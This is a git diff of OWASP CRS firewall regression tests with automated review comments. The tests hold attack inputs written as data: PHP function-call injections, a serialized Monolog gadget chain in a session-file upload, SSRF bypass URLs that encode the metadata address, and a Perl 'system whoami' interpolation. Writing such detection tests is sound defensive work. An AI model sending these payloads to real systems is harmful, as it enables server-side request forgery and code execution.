- - test_id: 5 + - test_id: 4 desc: call_user_func stages: - input: 
@@ -78,12 +62,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOcall_user_func" + uri: "/get?foo=FOOcall_user_func()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 6 + - test_id: 5 desc: fsockopen stages: - input: @@ -94,12 +78,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOfsockopen" + uri: "/get?foo=FOOfsockopen()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 7 + - test_id: 6 desc: gzdecode stages: - input: @@ -110,12 +94,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOgzdecode" + uri: "/get?foo=FOOgzdecode()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 8 + - test_id: 7 desc: GzInFlAtE stages: - input: @@ -126,28 +110,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log: - expect_ids: [933150] - - test_id: 9 - desc: pHpInFo mixed case - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" + uri: "/get?foo=FOOGzInFlAtE()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 10 + - test_id: 8 desc: gzuncompress stages: - input: 
@@ -158,12 +126,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" + uri: "/get?test=I%20don%27t%20like%20gzuncompress/*comment*/()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 11 + - test_id: 9 desc: fsockopen stages: - input: @@ -178,7 +146,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 12 + - test_id: 10 desc: posix_getpwuiD stages: - input: @@ -194,11 +162,11 @@ tests: output: log: expect_ids: [933150] - - test_id: 13 + - test_id: 11 desc: shell_exec stages: - input: - data: Shell%5fexec=bla + data: test=Shell%5fexec=(bla) dest_addr: 127.0.0.1 headers: Host: localhost @@ -211,11 +179,11 @@ tests: output: log: expect_ids: [933150] - - test_id: 14 + - test_id: 12 desc: ZlIb_DeCoDe stages: - input: - data: ZlIb%5fDeCoDe=bla + data: test=ZlIb%5fDeCoDe=(bla) dest_addr: 127.0.0.1 headers: Host: localhost @@ -228,7 +196,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 15 + - test_id: 13 desc: get_defined_functions stages: - input: @@ -245,7 +213,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 16 + - test_id: 14 desc: get_defined_vars stages: - input: @@ -262,7 +230,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 17 + - test_id: 15 desc: | PHP function call in body, mixed case. payload: curl_iNit() @@ -281,7 +249,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 18 + - test_id: 16 desc: | PHP function call in body payload: posix_getegid() @@ -300,7 +268,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 19 + - test_id: 17 desc: | PHP function call in body, mixed case payload: Print_r() @@ -319,7 +287,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 20 + - test_id: 18 desc: | PHP function call in body. payload: strrev() 
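Review bot: In the `@@ -194,11 +162,11 @@` hunk the payload `data: test=Shell%5fexec=(bla)` places a literal `=` between the function name and the parenthesis, unlike the `name()` form every other rewritten case in this file uses, while `desc: shell_exec` gives no hint that this is deliberate. If the variant is intended, say so, e.g. `desc: shell_exec with '=' between name and parenthesis (body)`; if not, `data: test=Shell%5fexec(bla)` follows the pattern of the rest of the file. The `@@ -211,11 +179,11 @@` hunk (`data: test=ZlIb%5fDeCoDe=(bla)`) has the same ambiguity.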
@@ -338,7 +306,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 21 + - test_id: 19 desc: | False Positive test payload: the files (yep) @@ -356,7 +324,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 22 + - test_id: 20 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( @@ -374,7 +342,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 23 + - test_id: 21 desc: | False Positive test payload: executor() @@ -392,7 +360,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 24 + - test_id: 22 desc: | False Positive test payload: cheval($foo) @@ -410,7 +378,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 25 + - test_id: 23 desc: | False Positive test payload: audiofile($foo) @@ -428,7 +396,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 26 + - test_id: 24 desc: | False Positive test payload: the system is down() @@ -446,7 +414,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 27 + - test_id: 25 desc: | False Positive test payload: ecosystem() @@ -464,7 +432,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 28 + - test_id: 26 desc: | False Positive test, function doesn't exist payload: systems() @@ -482,7 +450,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 29 + - test_id: 27 desc: | False Positive test, function doesn't exist payload: system something() @@ -500,7 +468,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 30 + - test_id: 28 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - input: @@ -516,7 +484,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 31 + - test_id: 29 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - input: 
@@ -532,7 +500,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 32 + - test_id: 30 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) @@ -550,7 +518,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 33 + - test_id: 31 desc: | False positive with filename matching `fopen` stages: @@ -567,7 +535,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 34 + - test_id: 32 desc: | SEO Framework false positive matching 'strip_tags' in 'title_strip_tags' @@ -585,7 +553,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 35 + - test_id: 33 desc: False positive with SprintForTheCause matching printf stages: - input: @@ -601,7 +569,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 36 + - test_id: 34 desc: Don't block printf function (Handled by 933160) stages: - input: 
@@ -617,3 +585,83 @@ tests: output: log: no_expect_ids: [933150] + - test_id: 35 + desc: "False Positive: `unserialize` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=A%20loaded%20ghost%20gun%20(unserialized)%20was%20recovered%20in%20the%20car." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 36 + desc: "False Positive: phpinfo being used in english sentence" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=Moreover,%20phpinfo%20can%20potentially%20leak%20sensitive%20configuration%20details%20that%20an%20attacker%20can%20exploit%20to%20gain%20information%20about%20the%20server." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 37 + desc: "False Positive: `intval` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=PaintValdosta" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 38 + desc: "True Positive: match open parenthesis" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/?test=base64_decode(" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 39 + desc: "True Positive: match encoded parenthesis" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/?test=base64_decode%28" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 0d2dcfeb66..07608bce5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml 
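Review bot: Tests 35–37 send `method: POST` with the payload only in `uri` and no `data`, so the false-positive sentences are exercised as query arguments on a bodyless POST; if the query string is the intent, `method: GET` matches the other negative cases in this file, and if a form body is the intent the payload belongs in `data:`. The hunk also pins `unserialize`, `phpinfo` and `intval` only as non-matches for 933150, while the call-form positives (`intval(foo)`, `phpinfo(foo)`, `unserialize(foo)`) were added to 933160 alone; if any of those names are in 933150's own list, nothing here asserts that the call form still fires. The 933160 hunk `@@ -795,3 +795,99 @@` (tests 45–47) has the same POST/query-string layout.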
@@ -795,3 +795,99 @@ tests: output: log: expect_ids: [933160] + - test_id: 45 + desc: "False Positive: `unserialize` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=A%20loaded%20ghost%20gun%20(unserialized)%20was%20recovered%20in%20the%20car." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 46 + desc: "False Positive: phpinfo being used in english sentence" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=Moreover,%20phpinfo%20can%20potentially%20leak%20sensitive%20configuration%20details%20that%20an%20attacker%20can%20exploit%20to%20gain%20information%20about%20the%20server." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 47 + desc: "False Positive: `intval` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=PaintValdosta" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 48 + desc: "True Positive: Block intval function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=intval(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 49 + desc: "True Positive: Block phpinfo function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=phpinfo(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 50 + desc: "True Positive: Block unserialize function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=unserialize(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml new file mode 100644 index 0000000000..9816c1557f --- /dev/null 
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml 
@@ -0,0 +1,349 @@ +--- +meta: + author: "Felipe Zipitria" + description: "Tests for PHP Session File Upload Detection (CVE-2025-54236)" +rule_id: 933220 +tests: + - test_id: 1 + desc: "Should block: sess_ pattern via X-Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_d8ew88tqmabdcokhumchy8htqm + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 2 + desc: "Should block: sess_ pattern with Unix path via X_Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: /tmp/sess_abc123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 3 + desc: "Should block: sess_ pattern with Windows path via X-File-Name" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: 'C:\temp\sess_malicious12345678901' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 4 + desc: "Should block: sess_ pattern via X.Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X.Filename: sess_1234567890abcdefghij + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 5 + desc: "Should block: sess_ pattern via multipart upload" + stages: + - input: + dest_addr: 
"127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="sess_d8ew88tqmabdcokhumchy8htqm" + Content-Type: text/plain + + _|O:32:"Monolog\Handler\SyslogUdpHandler":1:{S:6:"socket";O:29:"Monolog\Handler\BufferHandler":7:{}} + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 6 + desc: "Should block: sess_ with hyphens in session ID" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abc-123-def-456-ghij + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 7 + desc: "Should block: sess_ pattern with nested path" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: /var/lib/php/sessions/sess_attackervector1234567890 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 8 + desc: "Should pass: normal filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: document.pdf + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 9 + desc: "Should pass: sess_ in middle of filename" + stages: + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: my_sess_data.txt + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 10 + desc: "Should pass: session as part of word" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: session_report.txt + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 11 + desc: "Should pass: sess_ with too short session ID" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_short + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 12 + desc: "Should pass: file with .sess extension" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: mydata.sess + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 13 + desc: "Should pass: no file upload" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 14 + desc: "Should block: sess_ with maximum length session ID (64 chars)" + stages: + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 15 + desc: "Should block: sess_ with minimum length session ID (20 chars)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_12345678901234567890 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 16 + desc: "Should block: sess_ via multipart with path" + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="custom_attributes[vat_id]"; filename="/tmp/sess_d8ew88tqmabdcokhumchy8htqm" + Content-Type: text/plain + + malicious payload + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 17 + desc: "Should pass: multipart upload with safe filename" + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; 
filename="safe_document.txt" + Content-Type: text/plain + + safe content + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 18 + desc: "Should block: sess_ with commas in session ID (6-bit encoding)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abc123,def456,ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 19 + desc: "Should block: sess_ with uppercase letters (verify lowercase transformation)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_ABC123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 20 + desc: "Should block: SESS_ uppercase prefix (verify lowercase transformation)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: SESS_abc123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index b71b664ce6..8161b5945e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml 
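Review bot: Test 14's `desc` claims a 64-character session ID, but `sess_abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwx` carries a 60-character ID (26 + 10 + 24), so it does not exercise the upper bound it names; either extend the value to 64 characters or change the desc to `(60 chars)`. If the rule bounds the ID length (the descs of tests 14 and 15 suggest 20–64), a `no_expect_ids: [933220]` sibling one character over the limit would pin the upper boundary the same way test 15 pins the lower one. Test 11 (`sess_short`, 5 chars) sits far below the 20-character minimum asserted by test 15; a 19-character negative would make that boundary precise as well.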
@@ -148,3 +148,21 @@ tests: output: log: no_expect_ids: [934110] + - test_id: 9 + desc: SSRF - check localhost bypass with malformed URL + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A127.0.0.1" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index 697f26b79a..021cd7253d 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml 
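Review bot: Test 9 covers only the slash-less form `http%3A127.0.0.1`; the 934120 hunk in the same commit also adds a one-slash variant (`http%3A%2F2852039166`, test 48), but no equivalent case is added here, so 934110's handling of that shape stays untested. A sibling test with `uri: "/get/test?ssrf=http%3A%2F127.0.0.1"` and `expect_ids: [934110]` would close the gap if the rule is meant to cover it.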
@@ -887,3 +887,147 @@ tests: output: log: expect_ids: [934120] + - test_id: 45 + desc: SSRF - malformed URL with dotless decimal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A2852039166" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 46 + desc: SSRF - malformed URL with dotless hexadecimal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0xA9FEA9FE" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 47 + desc: SSRF - malformed URL with IPv6 (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 48 + desc: SSRF - malformed URL with one slash - dotless decimal + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A%2F2852039166" + 
version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 49 + desc: SSRF - malformed URL with dotted octal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0251.0376.0251.0376" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 50 + desc: SSRF - malformed URL with 9-digit dotless decimal (converts to 7.91.205.21) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A123456789" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 51 + desc: SSRF - Negative test - malformed URL with invalid hex format (too short) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0xABCDEF" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 52 + desc: SSRF - Negative test - incomplete dotted hex (only 3 octets) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: 
"/get?ssrf=http%3A0xA9.0xFE.0xA9" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index 55a28d3bd0..b4d2936751 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -4,7 +4,7 @@ meta: rule_id: 934140 tests: - test_id: 1 - desc: Perl interpolation attack + desc: "Perl interpolation attack: @{[system 'whoami']}" stages: - input: dest_addr: 127.0.0.1 
